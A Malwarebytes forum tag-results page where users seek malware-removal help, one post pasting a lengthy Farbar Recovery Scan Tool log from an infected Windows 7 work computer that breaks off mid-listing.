Jump to content

Search the Community

Showing results for tags 'FARBAR'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

  1. System suddenly started acting up, can someone please help me check if I've got an infection? Files from Farbar attached. Addition.txt FRST.txt
  2. i followed the instructions here. https://forums.malwarebytes.com/topic/236105-kmspico-malware-infected-my-computer/ can i get a fixlist.txt thanks. FRST.txt Addition.txt malwarebytes.txt
  3. As the admin's post. Here's attached my farbar recovery scan and malwarebytes. I keep getting random link pop up when i clicked on link. And random ads shown up on my web search with note 'Ads by aura' on the right corner. Any help is appreciated. Thanks! FRST.txt Addition.txt Malwarebytes.txt
  4. Hello, I’ve been having problems with my PC and have run many malware scans from different software but my main protection is Avast with Malwarebytes premium. I noticed my router was redirecting to a strange IP so I decided to check my PC and removed some PUPs and other things malwarebytes found, but this didn’t fix the problem. I ran other detection programs like stinger, adwcleaner, tdsskiller, roguekiller, and some other and found a few more problems that I “removed” but I still feel uneasy after running a FRST scan. I was wondering if anyone would be willing to help me with this problem and make a fixtext for my FRST program. Also any information with the IP redirect would be helpful as well but I’ve contacted AT&T and am getting a router replacement (if that is the problem). Any response is greatly appreciated. Thanks, Joshua.
  5. Hi I can't turn web protection back on. Have run Farbar files attached. Addition.txt FRST.txt
  6. Hi I got infected and I am unable to launch farbar from normal desktop so I booted into windows recovery using a windows media USB. Then went to troubleshoot and opened Command Prompt I then than frst64.exe from command prompt and got the file i've attached I'm not sure what to do from here FRST.txt
  7. I had problems that had prevented me from installing or using any anti-virus software. I had to run a special build of Malwarebytes anti-rootkit from here to solve that problem and install Malware Bytes. Here's the forum where I posted my problems and was helped. I was redirected to this post and was able to do the threat scan; however, whenever I click on the link for the Farbar Recovery Scan tool, my browser closes. I am using Microsoft Edge as I had to uninstall both Google Chrome and Mozilla Firefox when they faced numerous problems and refused to open. I was strongly recommended to post here despite having Malware Bytes running on my computer. Here are the logs: quarantine log.txt threat log.txt system-log.txt mbar-log-2018-04-09 (12-49-04).txt mbar-log-2018-04-09 (17-18-19).txt
  8. It seems as though my (work) computer has sent out a large amount of emails to people I may have recently been in contact with. The email (which was not sent by me) contained a dead link [the link did not open anything] according to those who reached out to me regarding this email. If someone could help verify the issue, it would be greatly appreciated. Here are the .txt files extracted from the Farbar Recovery Scan Tool (x64 bit) (FRST) - FRST.txt - Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 11.03.2018 01 Ran by Beauty Exchange (administrator) on BEAUTYEXCHANGE (12-03-2018 14:23:11) Running from C:\Users\Beauty Exchange\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X4WUGCBP Loaded Profiles: Beauty Exchange & QBDataServiceUser23 (Available Profiles: Beauty Exchange & QBDataServiceUser23 & Guest) Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: IE) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (AMD) C:\Windows\System32\atiesrxx.exe (AMD) C:\Windows\System32\atieclxx.exe (Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\dlsdbnt.exe (Starfield Technologies) C:\Program Files (x86)\Workspace\offSyncService.exe (Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe () C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe (Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\dlpwdnt.exe (CANON INC.) C:\Program Files\Canon\Canon MF Network Scanner Selector\CMFNSS6.EXE (Starfield Technologies) C:\Users\Beauty Exchange\AppData\Local\Workspace\workspaceupdate.exe () C:\Program Files (x86)\NETGEAR\WNA3100\WNA3100.exe (Power Software Ltd) C:\Program Files\PowerISO\PWRISOVM.EXE (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\acrotray.exe (Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (CANON INC.) C:\Program Files (x86)\Canon\OIPTonerStatus\CnTnrStsTask.exe (ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE (Intuit, Inc.) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 13.0\QBDBMgrN.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil64_28_0_0_161_ActiveX.exe (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated) HKLM\...\Run: [MFNetworkScannerSelector] => C:\Program Files\Canon\Canon MF Network Scanner Selector\CMFNSS6.EXE [425512 2015-01-22] (CANON INC.) HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [377368 2013-12-16] (Power Software Ltd) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe [3477640 2012-09-23] (Adobe Systems Inc.) HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-08-12] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [Intuit SyncManager] => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe [2641272 2012-08-18] (Intuit Inc. All rights reserved.) HKLM-x32\...\Run: [Canon Toner Status] => C:\Program Files (x86)\Canon\OIPTonerStatus\CnTnrStsTask.exe [1868520 2016-08-08] (CANON INC.) HKU\S-1-5-21-890987734-199605990-4172685101-1000\...\Run: [Starfield Updater] => C:\Users\Beauty Exchange\AppData\Local\Workspace\workspaceupdate.exe [35008 2017-02-06] (Starfield Technologies) HKU\S-1-5-21-890987734-199605990-4172685101-1000\...\Run: [aepitall] => C:\Users\Beauty Exchange\AppData\Roaming\Microsoft\Devisapi\apilrror.exe [667136 2018-03-01] () HKU\S-1-5-21-890987734-199605990-4172685101-1000\...\MountPoints2: {28a85a68-3fb9-11e6-b05c-7071bca08d5f} - J:\LaunchU3.exe -a Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2015-11-20] ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA3100 Smart Wizard.lnk [2014-02-06] ShortcutTarget: NETGEAR WNA3100 Smart Wizard.lnk -> C:\Program Files (x86)\NETGEAR\WNA3100\WNA3100.exe () Startup: C:\Users\Beauty Exchange\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2018-02-12] ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{4EC0104C-B538-4FC0-8AE6-8A27EE6982D1}: [DhcpNameServer] 75.75.75.75 75.75.76.76 Tcpip\..\Interfaces\{700705CE-A709-4CA7-A019-19B8C24DD241}: [DhcpNameServer] 75.75.75.75 75.75.76.76 Tcpip\..\Interfaces\{C33AFBF4-9B97-4B88-9523-AF9EBA078846}: [NameServer] 67.205.168.151 Tcpip\..\Interfaces\{C33AFBF4-9B97-4B88-9523-AF9EBA078846}: [DhcpNameServer] 192.168.0.1 Internet Explorer: ================== HKU\S-1-5-21-890987734-199605990-4172685101-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp SearchScopes: HKU\S-1-5-21-890987734-199605990-4172685101-1000 -> DefaultScope {8C5B3C77-3C9A-43F8-BE73-2D956471410E} URL = hxxps://www.google.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-890987734-199605990-4172685101-1000 -> {8C5B3C77-3C9A-43F8-BE73-2D956471410E} URL = hxxps://www.google.com/search?q={searchTerms} BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2018-03-01] (Microsoft Corporation) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-27] (Google Inc.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\URLREDIR.DLL [2018-03-01] (Microsoft Corporation) BHO: No Name -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> No File BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated) BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation) BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-27] (Google Inc.) BHO-x32: Adobe Acrobat Create PDF Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2012-09-23] (Adobe Systems Incorporated) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\URLREDIR.DLL [2018-03-01] (Microsoft Corporation) BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation) BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2012-09-23] (Adobe Systems Incorporated) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-27] (Google Inc.) Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2012-09-23] (Adobe Systems Incorporated) Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-27] (Google Inc.) Toolbar: HKU\S-1-5-21-890987734-199605990-4172685101-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File DPF: HKLM-x32 {88DD90B6-C770-4CFF-B7A4-3AFD16BB8824} hxxps://apps8.fldfs.com/aspnet_client/system_web/4_0_30319/crystalreportviewers12/ActiveXControls/PrintControl.cab Handler-x32: intu-help-qb6 - {6898B29B-BF49-43cb-A0B1-D0B9496AF491} - C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 13.0\HelpAsyncPluggableProtocol.dll [2012-08-18] (Intuit, Inc.) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-03-01] (Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-03-01] (Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-03-01] (Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-03-01] (Microsoft Corporation) Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll [2010-11-20] (Microsoft Corporation) FireFox: ======== FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2014-02-06] [Legacy] [not signed] FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2018-03-01] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.) FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2012-09-23] (Adobe Systems Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems) FF Plugin HKU\S-1-5-21-890987734-199605990-4172685101-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Beauty Exchange\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2015-07-02] (Citrix Online) FF Plugin HKU\S-1-5-21-890987734-199605990-4172685101-1000: @starfield.com/off -> C:\Users\Beauty Exchange\AppData\Roaming\Mozilla\Plugins\npoff.dll [2017-02-06] ( Starfield Technologies, LLC.) FF Plugin HKU\S-1-5-21-890987734-199605990-4172685101-1000: @starfield.com/off64 -> C:\Users\Beauty Exchange\AppData\Roaming\Mozilla\Plugins\npoff64.dll [2017-02-06] ( Starfield Technologies, LLC.) FF Plugin HKU\S-1-5-21-890987734-199605990-4172685101-1000: @starfield.com/wbe -> C:\Users\Beauty Exchange\AppData\Roaming\Mozilla\Plugins\npwbe.dll [2017-02-06] (Starfield Technology, LLC) FF Plugin HKU\S-1-5-21-890987734-199605990-4172685101-1000: @starfield.com/wbe64 -> C:\Users\Beauty Exchange\AppData\Roaming\Mozilla\Plugins\npwbe64.dll [2017-02-06] (Starfield Technology, LLC) FF Plugin ProgramFiles/Appdata: C:\Users\Beauty Exchange\AppData\Roaming\mozilla\plugins\npoff.dll [2017-02-06] ( Starfield Technologies, LLC.) FF Plugin ProgramFiles/Appdata: C:\Users\Beauty Exchange\AppData\Roaming\mozilla\plugins\npoff64.dll [2017-02-06] ( Starfield Technologies, LLC.) FF Plugin ProgramFiles/Appdata: C:\Users\Beauty Exchange\AppData\Roaming\mozilla\plugins\npwbe.dll [2017-02-06] (Starfield Technology, LLC) FF Plugin ProgramFiles/Appdata: C:\Users\Beauty Exchange\AppData\Roaming\mozilla\plugins\npwbe64.dll [2017-02-06] (Starfield Technology, LLC) Chrome: ======= CHR DefaultProfile: Default CHR StartupUrls: Default -> "hxxp://www.googl.e.com/" CHR Profile: C:\Users\Beauty Exchange\AppData\Local\Google\Chrome\User Data\Default [2018-03-05] CHR Extension: (Docs) - C:\Users\Beauty Exchange\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-01-25] CHR Extension: (Google Drive) - C:\Users\Beauty Exchange\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-17] CHR Extension: (YouTube) - C:\Users\Beauty Exchange\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-17] CHR Extension: (Google Search) - C:\Users\Beauty Exchange\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-17] CHR Extension: (Google Docs Offline) - C:\Users\Beauty Exchange\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Beauty Exchange\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-10-05] CHR Extension: (Gmail) - C:\Users\Beauty Exchange\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-15] CHR Extension: (Chrome Media Router) - C:\Users\Beauty Exchange\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-25] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-08-12] (Advanced Micro Devices, Inc.) [File not signed] R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [7962800 2018-02-22] (Microsoft Corporation) R2 DLPWD; C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\DLPWDNT.EXE [155496 2012-09-26] (Dell Inc.) R2 DLSDB; C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\DLSDBNT.EXE [343400 2012-09-26] (Dell Inc.) R2 File Backup; C:\Program Files (x86)\Workspace\offSyncService.exe [697472 2014-10-20] (Starfield Technologies) R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6440736 2018-03-03] (Malwarebytes) R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2012-08-18] (Intuit) [File not signed] S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2012-08-18] (Intuit Inc.) [File not signed] R2 QBVSS; C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2012-08-18] (Intuit Inc.) [File not signed] R3 QuickBooksDB23; C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 13.0\QBDBMgrN.exe [679936 2012-08-18] (Intuit, Inc.) [File not signed] R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Corporation) R2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [285152 2010-08-26] () ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices) R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [76200 2018-01-18] () R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193248 2018-03-12] (Malwarebytes) R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [109800 2018-03-12] (Malwarebytes) R3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [45960 2018-03-12] (Malwarebytes) R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253664 2018-03-12] (Malwarebytes) R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [92280 2018-03-12] (Malwarebytes) S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.) S3 VGPU; System32\drivers\rdvgkmd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2018-03-12 14:21 - 2018-03-12 14:23 - 000000000 ____D C:\FRST 2018-03-12 14:17 - 2018-03-12 14:21 - 000092280 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys 2018-03-12 14:17 - 2018-03-12 14:17 - 000253664 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys 2018-03-12 14:17 - 2018-03-12 14:17 - 000193248 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys 2018-03-12 14:17 - 2018-03-12 14:17 - 000109800 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys 2018-03-12 14:17 - 2018-03-12 14:17 - 000045960 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys 2018-03-12 14:17 - 2018-03-12 14:17 - 000001867 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2018-03-12 14:17 - 2018-03-12 14:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes 2018-03-12 14:17 - 2018-03-12 14:17 - 000000000 ____D C:\ProgramData\MB2Migration 2018-03-12 14:17 - 2018-03-12 14:17 - 000000000 ____D C:\Program Files\Malwarebytes 2018-03-12 14:17 - 2018-01-18 09:03 - 000076200 _____ C:\Windows\system32\Drivers\mbae64.sys 2018-03-08 11:26 - 2018-03-08 11:26 - 000011446 _____ C:\Users\Beauty Exchange\Downloads\Untitled (2) 2018-03-02 12:31 - 2018-03-05 17:54 - 000000000 ____D C:\Windows\system32\appmgmt 2018-03-02 04:28 - 2018-03-02 04:28 - 000000000 ____D C:\6f16d32e1493efcc5377a4493987a767 2018-03-01 10:32 - 2018-03-01 10:32 - 000667136 _____ (Simple Kind) C:\Users\Beauty Exchange\AppData\Roaming\4224ef6a.exe 2018-03-01 10:32 - 2018-03-01 10:32 - 000667136 _____ (Simple Kind) C:\Users\Beauty Exchange\AppData\Roaming\15b14147.exe 2018-03-01 10:32 - 2018-03-01 10:32 - 000000000 _____ C:\Users\Beauty Exchange\Documents\1.txt 2018-02-27 14:17 - 2018-02-27 14:17 - 000123013 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_2_2018 (6).pdf 2018-02-27 14:15 - 2018-02-27 14:15 - 000114003 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_23_2018 (2).pdf 2018-02-23 13:43 - 2018-02-23 13:43 - 000347473 _____ C:\Users\Beauty Exchange\Desktop\Open Enrollment Letter.pdf 2018-02-22 16:03 - 2018-02-22 16:03 - 000088991 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_23_2018 (1).pdf 2018-02-22 16:01 - 2018-02-22 16:01 - 000074642 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_23_2018.pdf 2018-02-20 17:38 - 2018-02-20 17:38 - 000198551 _____ C:\Users\Beauty Exchange\Downloads\Federal W-2 4_1_2017 (2).pdf 2018-02-20 17:28 - 2018-02-20 17:28 - 000121798 _____ C:\Users\Beauty Exchange\Downloads\W2 Verification Report 4_1_2017.pdf 2018-02-20 17:19 - 2018-02-20 17:19 - 000213707 _____ C:\Users\Beauty Exchange\Downloads\Payroll Reports - All of the Above 2_16_2018.PDF 2018-02-20 17:16 - 2018-02-20 17:16 - 000123208 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_16_2018 (1).pdf 2018-02-20 17:04 - 2018-02-20 17:04 - 000089081 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 1_19_2018 (3).pdf 2018-02-20 17:03 - 2018-02-20 17:03 - 000089002 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 1_26_2018 (3).pdf 2018-02-20 17:02 - 2018-02-20 17:02 - 000089040 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_2_2018 (5).pdf 2018-02-20 17:00 - 2018-02-20 17:00 - 000089036 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_9_2018 (2).pdf 2018-02-20 16:55 - 2018-02-20 16:55 - 000088884 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_16_2018.pdf 2018-02-20 16:48 - 2018-02-20 16:48 - 000089036 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_9_2018 (1).pdf 2018-02-20 16:47 - 2018-02-20 16:47 - 000064904 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_12_2018.pdf 2018-02-20 16:45 - 2018-02-20 16:45 - 000089040 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_2_2018 (4).pdf 2018-02-20 16:43 - 2018-02-20 16:43 - 000089002 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 1_26_2018 (2).pdf 2018-02-20 16:25 - 2018-02-20 16:25 - 000089081 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 1_19_2018 (2).pdf 2018-02-16 10:21 - 2018-02-16 10:21 - 000000000 ____D C:\74f73fd7d831c9dbc9ff93e379 2018-02-13 12:53 - 2018-02-13 12:53 - 000118676 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_2_2018 (3).pdf 2018-02-13 12:50 - 2018-02-13 12:50 - 000109816 _____ C:\Users\Beauty Exchange\Downloads\Paycheck Detail Report 2_9_2018.pdf 2018-02-13 10:50 - 2018-02-13 10:50 - 000000000 ____D C:\833241a07707b2b730e6446d ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2018-03-12 14:21 - 2009-07-14 00:45 - 000023872 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2018-03-12 14:21 - 2009-07-14 00:45 - 000023872 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2018-03-12 14:17 - 2014-06-30 11:44 - 000000000 ____D C:\ProgramData\Malwarebytes 2018-03-12 13:48 - 2009-07-14 01:13 - 000781298 _____ C:\Windows\system32\PerfStringBackup.INI 2018-03-12 13:48 - 2009-07-13 23:20 